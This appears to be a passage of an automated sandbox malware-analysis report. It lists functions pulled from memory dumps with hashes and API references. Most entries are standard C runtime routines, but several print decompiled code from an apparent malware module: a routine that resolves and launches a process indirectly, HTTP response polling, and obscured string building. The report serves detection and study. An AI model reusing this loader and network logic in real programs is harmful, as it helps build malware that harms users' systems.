Opcode Fuzzy Hash: 8278575820984f82d5cfa51b9a5204f8a8120e252ec473b45d5e9ad0aad45b22
Instruction Fuzzy Hash: E8913A79900218AFCB11FFA5DC88AAEBBB9EF09350F154454F406DB261DB31ED51DB60

Uniqueness

Uniqueness Score: -1.00%

Function 0042A723, Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 368COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0042A7B2
_get_int64_arg.LIBCMTD ref: 0042A7DA
__aullrem.LIBCMT ref: 0042A97F
__aulldiv.LIBCMT ref: 0042A9A1
_write_multi_char.LIBCMTD ref: 0042AAA8
_write_string.LIBCMTD ref: 0042AAC3
_write_multi_char.LIBCMTD ref: 0042AAEF
_wctomb_s.LIBCMTD ref: 0042AB6C

Strings

-, xrefs: 0042AA48
9, xrefs: 0042A9B2

Memory Dump Source

Source File: 00000000.00000002.516842254.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem_wctomb_s_write_string
String ID: -$9
API String ID: 3451365851-1631151375
Opcode ID: e28aa4a69d47067587227fdaa3a01ec24bcfd6af5c749e57e9b6fedd5fc2f0d6
Instruction ID: 5768582fac8c43387616b99d68fdf82a4864eeb7edf537182040432915f1b9eb
Opcode Fuzzy Hash: e28aa4a69d47067587227fdaa3a01ec24bcfd6af5c749e57e9b6fedd5fc2f0d6
Instruction Fuzzy Hash: 1AF14BB1E012298FDB24CF59DC89BAEB7B1BF44304F5481DAD419A7281D7385E90CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 0042C365, Relevance: 28.4, APIs: 15, Strings: 1, Instructions: 365COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0042C3FA
_get_int64_arg.LIBCMTD ref: 0042C422
__aullrem.LIBCMT ref: 0042C5CA
__aulldiv.LIBCMT ref: 0042C5EC
_write_multi_char.LIBCMTD ref: 0042C705
_write_string.LIBCMTD ref: 0042C720
_write_multi_char.LIBCMTD ref: 0042C74C
__mbtowc_l.LIBCMTD ref: 0042C7BB

Strings

9, xrefs: 0042C5FD

Memory Dump Source

Source File: 00000000.00000002.516842254.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem__mbtowc_l_write_string
String ID: 9
API String ID: 3455034128-2366072709
Opcode ID: 6bba68cdb59bf134c0e80eea741eb4f53aa035d0e13288ddc792c03e4895b889
Instruction ID: 4e3a7109be664062710a8a701993b912deb9bd5ba5507a28f10cd2de23853de9
Opcode Fuzzy Hash: 6bba68cdb59bf134c0e80eea741eb4f53aa035d0e13288ddc792c03e4895b889
Instruction Fuzzy Hash: 9FF15BB1E002299FDB24CF54DC81BAEB7B5FF45304F54819AE50AA7241D738AE84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00426E13, Relevance: 25.8, APIs: 17, Instructions: 319COMMON

Download Yara Rule

APIs

_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00426E5B
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00426E91
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00426EB2
wcsncnt.LIBCMTD ref: 00426EE9
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00426F4F
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 004271A0

Memory Dump Source

Source File: 00000000.00000002.516842254.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: Locale$UpdateUpdate::~_$wcsncnt
String ID:
API String ID: 986326057-0
Opcode ID: 4029536ff3794a448cb2d4c6b09713a0f3d9a68f9f71466847964e004da4b8bc
Instruction ID: fef1a2ab7ae87b42cd82c95954904b9407d0e0c4f144fbd24a1977278f886bd7
Opcode Fuzzy Hash: 4029536ff3794a448cb2d4c6b09713a0f3d9a68f9f71466847964e004da4b8bc
Instruction Fuzzy Hash: 06E12730A0411CDFCB04DF94D990BEEB7B1FF49304F60855AE8226B291DB38AE55CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0042A487, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 241COMMON

Download Yara Rule

APIs

_get_int_arg.LIBCMTD ref: 0042A48B
__get_printf_count_output.LIBCMTD ref: 0042A499
__invalid_parameter.LIBCMTD ref: 0042A520
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 0042A535
_write_multi_char.LIBCMTD ref: 0042AAA8
_write_string.LIBCMTD ref: 0042AAC3
_write_multi_char.LIBCMTD ref: 0042AAEF
_wctomb_s.LIBCMTD ref: 0042AB6C

Strings

-, xrefs: 0042AA48

Memory Dump Source

Source File: 00000000.00000002.516842254.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: Locale_write_multi_char$UpdateUpdate::~___get_printf_count_output__invalid_parameter_get_int_arg_wctomb_s_write_string
String ID: -
API String ID: 2357813345-2547889144
Opcode ID: 330b75ef8c6b94f476b8245b549597da44c28c4e36eedd74208aa3d818deb831
Instruction ID: b5779205d5c995a4451537acb9b285c1508ed452f283a708dc9f6dcc18072e63
Opcode Fuzzy Hash: 330b75ef8c6b94f476b8245b549597da44c28c4e36eedd74208aa3d818deb831
Instruction Fuzzy Hash: 06A1AD70E002298BDB20CF55DC49BEEB7B1AF44304F5481DAE9196A281D7B89ED0CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 0042A2D5, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 225COMMON

Download Yara Rule

APIs

_get_int_arg.LIBCMTD ref: 0042A2D9
_strlen.LIBCMT ref: 0042A309
_write_multi_char.LIBCMTD ref: 0042AAA8
_write_string.LIBCMTD ref: 0042AAC3
_write_multi_char.LIBCMTD ref: 0042AAEF
_wctomb_s.LIBCMTD ref: 0042AB6C

Strings

-, xrefs: 0042AA48

Memory Dump Source

Source File: 00000000.00000002.516842254.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: _write_multi_char$_get_int_arg_strlen_wctomb_s_write_string
String ID: -
API String ID: 2232461714-2547889144
Opcode ID: 9b38da79696b48017a79a3751c51525cb983d411d580641f96091f56c5ccbf54
Instruction ID: 94d2a2536a4a82b5e8edfb32a7597327a0cd8d8894139d306bcd96a60aa7742e
Opcode Fuzzy Hash: 9b38da79696b48017a79a3751c51525cb983d411d580641f96091f56c5ccbf54
Instruction Fuzzy Hash: 86A18C70E012288FDB24CF54DC89BEEB7B1AF48304F5481DAD9196B281D7789E90CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 0042C0CA, Relevance: 16.7, APIs: 11, Instructions: 238COMMON

Download Yara Rule

APIs

_get_int_arg.LIBCMTD ref: 0042C0CE
__get_printf_count_output.LIBCMTD ref: 0042C0DC
__invalid_parameter.LIBCMTD ref: 0042C163
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 0042C178
_write_multi_char.LIBCMTD ref: 0042C705
_write_string.LIBCMTD ref: 0042C720
_write_multi_char.LIBCMTD ref: 0042C74C
__mbtowc_l.LIBCMTD ref: 0042C7BB

Memory Dump Source

Source File: 00000000.00000002.516842254.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: Locale_write_multi_char$UpdateUpdate::~___get_printf_count_output__invalid_parameter__mbtowc_l_get_int_arg_write_string
String ID:
API String ID: 2386203720-0
Opcode ID: 6b55c97c5d38f768529eb9a498839eb9daa0eabcb21bb336c34a87882dc5178e
Instruction ID: b0bc953091ea53511eade718ba1797b027b1da0eac485b5af418e36c08787531
Opcode Fuzzy Hash: 6b55c97c5d38f768529eb9a498839eb9daa0eabcb21bb336c34a87882dc5178e
Instruction Fuzzy Hash: BAA1A1B4E002299BDF24DF55DC81BAEB3B4EB44304F54809AE61A67282D7785E84CF5D

Uniqueness

Uniqueness Score: -1.00%

Function 004263D6, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 131COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00426438
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 0042644D
_memset.LIBCMT ref: 004264D4
__invalid_parameter.LIBCMTD ref: 00426534
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00426546
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00426581

Strings

P, xrefs: 00426556
", xrefs: 0042653C

Memory Dump Source

Source File: 00000000.00000002.516842254.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: Locale$UpdateUpdate::~_$_memset$__invalid_parameter
String ID: "$P
API String ID: 2173491032-1577843662
Opcode ID: f33f6cca13dd0591231f2ea0095d8a183edf30a1ce6d78efc314899412832e97
Instruction ID: 1a82be16964e5600e8e4b88b2902022e31a0fbd6086eddf4af79fb1583debbed
Opcode Fuzzy Hash: f33f6cca13dd0591231f2ea0095d8a183edf30a1ce6d78efc314899412832e97
Instruction Fuzzy Hash: 53518A30E00219EFCB14DF58E846AAE77B1FF44318F61862AE825573D1D3789996CF89

Uniqueness

Uniqueness Score: -1.00%

Function 0042BEF4, Relevance: 13.7, APIs: 9, Instructions: 222COMMON

Download Yara Rule

APIs

_get_int_arg.LIBCMTD ref: 0042BEF8
_strlen.LIBCMT ref: 0042BF28
_write_multi_char.LIBCMTD ref: 0042C705
_write_string.LIBCMTD ref: 0042C720
_write_multi_char.LIBCMTD ref: 0042C74C
__mbtowc_l.LIBCMTD ref: 0042C7BB

Memory Dump Source

Source File: 00000000.00000002.516842254.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: _write_multi_char$__mbtowc_l_get_int_arg_strlen_write_string
String ID:
API String ID: 909868375-0
Opcode ID: 3d807984be9d6bb2df6003a4d26d4d88c91a2463fac1afd7e3bf221db6938e08
Instruction ID: 676b2cfc686dd59f27ef75bce28c3be876581e7b347b3d3e2a3567806fc295dd
Opcode Fuzzy Hash: 3d807984be9d6bb2df6003a4d26d4d88c91a2463fac1afd7e3bf221db6938e08
Instruction Fuzzy Hash: 3BA180B0E00228DBDB24CF55DC81BAEB3B5EB44305F54819AE51A67282D778AE84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 03C48F85, Relevance: 13.6, APIs: 9, Instructions: 112
stringCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E03C48F85(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0x3c4d33c; // 0x4759798
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E03C49B1B(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x3c4c18c;
				}
				_t46 = E03C47F8B(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E03C41525(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x3c4d2a8; // 0xb0a5a8
						_t16 = _t75 + 0x3c4eb08; // 0x530025
						 *0x3c4d118(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E03C49B1B(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x3c4c190;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E03C41525(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E03C48B22(_v20);
						} else {
							_t66 =  *0x3c4d2a8; // 0xb0a5a8
							_t31 = _t66 + 0x3c4ec28; // 0x73006d
							 *0x3c4d118(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E03C48B22(_v12);
				}
				return _v24;
			}

0x03c48f8d
0x03c48f93
0x03c48f9a
0x03c48fa0
0x03c48fa4
0x03c48fa8
0x03c48fab
0x03c48fb0
0x03c48fb5
0x03c48fb7
0x03c48fb7
0x03c48fc0
0x03c48fc5
0x03c48fca
0x03c48fd0
0x03c48fda
0x03c48fe3
0x03c48fea
0x03c49003
0x03c49008
0x03c4900d
0x03c49016
0x03c4901f
0x03c49030
0x03c49039
0x03c4903d
0x03c49041
0x03c49046
0x03c4904b
0x03c4904d
0x03c4904d
0x03c49057
0x03c49060
0x03c49067
0x03c4907f
0x03c49083
0x03c490c0
0x03c49085
0x03c49088
0x03c49090
0x03c490a1
0x03c490ad
0x03c490b5
0x03c490b9
0x03c490b9
0x03c49083
0x03c490c8
0x03c490cd
0x03c490d4

APIs

GetTickCount.KERNEL32 ref: 03C48F9A
lstrlen.KERNEL32(?,80000002,00000005), ref: 03C48FDA
lstrlen.KERNEL32(00000000), ref: 03C48FE3
lstrlen.KERNEL32(00000000), ref: 03C48FEA
lstrlenW.KERNEL32(80000002), ref: 03C48FF7
lstrlen.KERNEL32(?,00000004), ref: 03C49057
lstrlen.KERNEL32(?), ref: 03C49060
lstrlen.KERNEL32(?), ref: 03C49067
lstrlenW.KERNEL32(?), ref: 03C4906E

Part of subcall function 03C48B22: RtlFreeHeap.NTDLL(00000000,00000000,03C4131A,00000000,?,?,00000000), ref: 03C48B2E

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$CountFreeHeapTick
String ID:
API String ID: 2535036572-0
Opcode ID: d099e6f35a6670967ee1a116dcbe7e01306bfd5aaa6e76d9fb337ddfce8898b8
Instruction ID: d1af2f4b3e497369ca44ce300bfc946fbd7693f6482b9a22f6bfe2634d8ebe41
Opcode Fuzzy Hash: d099e6f35a6670967ee1a116dcbe7e01306bfd5aaa6e76d9fb337ddfce8898b8
Instruction Fuzzy Hash: 0D410A76900219FBCF11EFA4CC48ADEBBB5EF48354F064050E905EB225DB369A55EB90

Uniqueness

Uniqueness Score: -1.00%

Function 0041A3A5, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 264memoryCOMMON

Download Yara Rule

APIs

_CheckBytes.LIBCMTD ref: 0041A3B9
__CrtIsValidHeapPointer.LIBCMTD ref: 0041A445
_CheckBytes.LIBCMTD ref: 0041A4F0
_CheckBytes.LIBCMTD ref: 0041A5AA
_memset.LIBCMT ref: 0041A6A1
__free_base.LIBCMTD ref: 0041A6AD

Strings

tDj, xrefs: 0041A3FB

Memory Dump Source

Source File: 00000000.00000002.516842254.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: BytesCheck$HeapPointerValid__free_base_memset
String ID: tDj
API String ID: 25084783-2513116121
Opcode ID: 71aa9a90eb5f64dacc70286fbac619a336f71b7ee24760cba3e339261cfa5227
Instruction ID: b2df5de95988d943d8b6a0ea3821f64ddfea88519d453d02c52aa0692e8b57c6
Opcode Fuzzy Hash: 71aa9a90eb5f64dacc70286fbac619a336f71b7ee24760cba3e339261cfa5227
Instruction Fuzzy Hash: C8910870B40204BBDB14CB44DD82FAA7365AF58704F34416AF5056B3C2D2B9EE91DB9E

Uniqueness

Uniqueness Score: -1.00%

Function 00425F70, Relevance: 12.2, APIs: 8, Instructions: 160COMMON

Download Yara Rule

APIs

_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00425FAE
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00425FD8
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00426023

Memory Dump Source

Source File: 00000000.00000002.516842254.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: Locale$UpdateUpdate::~_
String ID:
API String ID: 1901436342-0
Opcode ID: 5454bf86ac5b9445ec255422de03270a8eaeb43f6193995c6d6ff00f9007bcc0
Instruction ID: e8b6b76ac2a09f24078724842e3ff73960655b2b00b61835e32dc722ca3d9891
Opcode Fuzzy Hash: 5454bf86ac5b9445ec255422de03270a8eaeb43f6193995c6d6ff00f9007bcc0
Instruction Fuzzy Hash: E9611B70A0011DDFCB04DF95D5909EEB7B1FF49304F60815AE826AB391DB34AE41DB99

Uniqueness

Uniqueness Score: -1.00%

Function 03C43485, Relevance: 10.6, APIs: 7, Instructions: 109
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E03C43485(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E03C44944(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E03C4A789( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x3c4d260 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x3c4d2a8; // 0xb0a5a8
					_t18 = _t47 + 0x3c4e3e6; // 0x73797325
					_t68 = E03C47912(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x3c4d2a8; // 0xb0a5a8
						_t19 = _t50 + 0x3c4e747; // 0x4758cef
						_t20 = _t50 + 0x3c4e0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E03C43179();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E03C43179();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x3c4d238, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E03C48B22(_t70);
				goto L12;
			}

0x03c4348d
0x03c4348d
0x03c4349c
0x03c434a3
0x03c434a8
0x03c435b5
0x03c435bc
0x03c435bc
0x03c434b7
0x03c434bf
0x03c434c2
0x03c434c7
0x03c434dc
0x03c434e2
0x03c434e3
0x03c434e6
0x03c434ec
0x03c434ef
0x03c434f4
0x03c434fc
0x03c43508
0x03c4350c
0x03c4359c
0x03c43512
0x03c43512
0x03c43517
0x03c4351e
0x03c43532
0x03c43536
0x03c43585
0x03c43538
0x03c43539
0x03c43540
0x03c43559
0x03c4355b
0x03c4355f
0x03c43566
0x03c43580
0x03c43568
0x03c43571
0x03c43576
0x03c43576
0x03c43566
0x03c43594
0x03c43594
0x03c4350c
0x03c435a3
0x03c435ac
0x03c435b0
0x00000000

APIs

Part of subcall function 03C44944: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,03C434A1,?,00000001,?,?,00000000,00000000), ref: 03C44969
Part of subcall function 03C44944: GetProcAddress.KERNEL32(00000000,7243775A), ref: 03C4498B
Part of subcall function 03C44944: GetProcAddress.KERNEL32(00000000,614D775A), ref: 03C449A1
Part of subcall function 03C44944: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 03C449B7
Part of subcall function 03C44944: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 03C449CD
Part of subcall function 03C44944: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 03C449E3

memset.NTDLL ref: 03C434EF

Part of subcall function 03C47912: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,03C43508,73797325), ref: 03C47923
Part of subcall function 03C47912: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 03C4793D

GetModuleHandleA.KERNEL32(4E52454B,04758CEF,73797325), ref: 03C43525
GetProcAddress.KERNEL32(00000000), ref: 03C4352C
HeapFree.KERNEL32(00000000,00000000), ref: 03C43594

Part of subcall function 03C43179: GetProcAddress.KERNEL32(36776F57,03C48BDC), ref: 03C43194

CloseHandle.KERNEL32(00000000,00000001), ref: 03C43571
CloseHandle.KERNEL32(?), ref: 03C43576
GetLastError.KERNEL32(00000001), ref: 03C4357A

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
String ID:
API String ID: 3075724336-0
Opcode ID: 18b95c9edc62a8a05b3f5d0fbc865df752d846184d640c18916a143ecc2dd3b3
Instruction ID: 53d978fa95e084f1c9e3cb7b2fc9da98858499b4eb5b27a9f1aa6d9cf436cfa7
Opcode Fuzzy Hash: 18b95c9edc62a8a05b3f5d0fbc865df752d846184d640c18916a143ecc2dd3b3
Instruction Fuzzy Hash: A0313FBA900208BFDB21FFA4DC88E9EBBBCEB44214F154565E606E7111D731AE58DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0042A751, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 104COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0042A7B2
__aullrem.LIBCMT ref: 0042A97F
__aulldiv.LIBCMT ref: 0042A9A1

Strings

0, xrefs: 0042A76D
', xrefs: 0042A751
9, xrefs: 0042A9B2

Memory Dump Source

Source File: 00000000.00000002.516842254.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: '$0$9
API String ID: 3120068967-269856862
Opcode ID: 327a9953c4c473a7afef10fe0b1b1c07e9e32e551558298e4dbbb7f0609559cb
Instruction ID: c619b752f1557e33250a138e9c210cd73f6603a4d30299c773b3d52b82599986
Opcode Fuzzy Hash: 327a9953c4c473a7afef10fe0b1b1c07e9e32e551558298e4dbbb7f0609559cb
Instruction Fuzzy Hash: 9E4103B1E05628DFDB24CF49D889BAEB7B5BF84304F6485DAD448A7241C3389E91CF46

Uniqueness

Uniqueness Score: -1.00%

Function 03C457DD, Relevance: 10.6, APIs: 7, Instructions: 92
networksynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E03C457DD(void* __ecx, void* __esi) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				void* _t58;
				void* _t59;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_v8 = 4;
						_v16 = 0;
						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
							_t58 = E03C41525(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
									E03C48B22(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *(_t61 + 0xc) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E03C429C0( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}

0x03c457dd
0x03c457dd
0x03c457ed
0x03c457f0
0x03c457f4
0x03c457fa
0x03c457ff
0x03c45818
0x03c4582c
0x03c45833
0x03c4583a
0x03c4588d
0x03c45893
0x03c45899
0x03c458d4
0x03c458da
0x00000000
0x00000000
0x00000000
0x03c45899
0x03c45840
0x00000000
0x03c45847
0x03c45855
0x03c45858
0x03c4585b
0x03c45867
0x03c4586b
0x03c458cd
0x03c4586d
0x03c4587f
0x03c458bd
0x03c458c8
0x03c45881
0x03c45884
0x03c45888
0x03c45888
0x03c4587f
0x00000000
0x03c4586b
0x03c45840
0x03c45804
0x03c4580a
0x03c4580d
0x03c45812
0x00000000
0x00000000
0x00000000
0x03c458a2
0x03c458aa
0x03c458af
0x03c458b2
0x00000000

APIs

WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,751881D0), ref: 03C457F4
SetEvent.KERNEL32(?), ref: 03C45804
HttpQueryInfoA.WININET(?,20000013,?,?), ref: 03C45836
HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 03C4585B
HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 03C4587B
GetLastError.KERNEL32 ref: 03C4588D

Part of subcall function 03C429C0: WaitForMultipleObjects.KERNEL32(00000002,03C4A923,00000000,03C4A923,?,?,?,03C4A923,0000EA60), ref: 03C429DB

Part of subcall function 03C48B22: RtlFreeHeap.NTDLL(00000000,00000000,03C4131A,00000000,?,?,00000000), ref: 03C48B2E

GetLastError.KERNEL32(00000000), ref: 03C458C2

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
String ID:
API String ID: 3369646462-0
Opcode ID: decbd76a08cb1eacc1120abe55de5d915766aefda32412fb8f9ad58de555dae7
Instruction ID: caf7d2fe0b36e6efda4f5212d4dc6ce02670f6459433db764923897d93b50c1a
Opcode Fuzzy Hash: decbd76a08cb1eacc1120abe55de5d915766aefda32412fb8f9ad58de555dae7
Instruction Fuzzy Hash: B6311EB6D0030DFFDB20EFA5C88499EB7F8EB09304F14496AE542E6251DB719A489F50

Uniqueness

Uniqueness Score: -1.00%

Function 03C47B8D, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E03C47B8D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x3c4d2a8; // 0xb0a5a8
				_t1 = _t9 + 0x3c4e62c; // 0x253d7325
				_t36 = 0;
				_t28 = E03C4A055(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E03C41525(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E03C41188(_t34, _t41, _a8);
						E03C48B22(_t41);
						_t42 = E03C4976F(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E03C48B22(_t36);
							_t36 = _t42;
						}
						_t43 = E03C4A41C(_t36, _t33);
						if(_t43 != 0) {
							E03C48B22(_t36);
							_t36 = _t43;
						}
					}
					E03C48B22(_t28);
				}
				return _t36;
			}

0x03c47b8d
0x03c47b90
0x03c47b91
